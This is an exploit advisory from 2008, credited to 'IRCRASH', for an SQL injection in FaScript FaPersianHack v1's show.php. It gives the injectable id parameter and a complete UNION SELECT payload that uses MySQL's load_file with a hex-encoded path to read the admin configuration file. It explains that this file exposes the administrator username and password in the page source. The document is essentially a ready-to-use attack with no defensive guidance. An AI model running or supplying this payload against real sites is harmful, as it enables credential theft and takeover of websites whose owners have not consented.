FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability :: 2008-01-15
##################################################################################### #### FaScript FaPersianHack v1 Remote Sql Injection #### #### BY IRCRASH #### ##################################################################################### # # #AUTHOR : IRCRASH (Dr.Crash) # # # #Script Download : http://fascript.com/fapersianhack.zip # # # #Injection Adress : http://Sitename/ph/show.php?id=<SqL Code> # # # #Help : In This Script Admin Username and Password Save in ./admin/pconfig.php # # You can open this file with load_file Function in mysql and see admin # # Username and password in Page Source # # # # ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 # # # #SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6/**/from/**/mysql.user/* # # # Our site : HTTP://IRCRASH.COM # # # #####################################################################################Download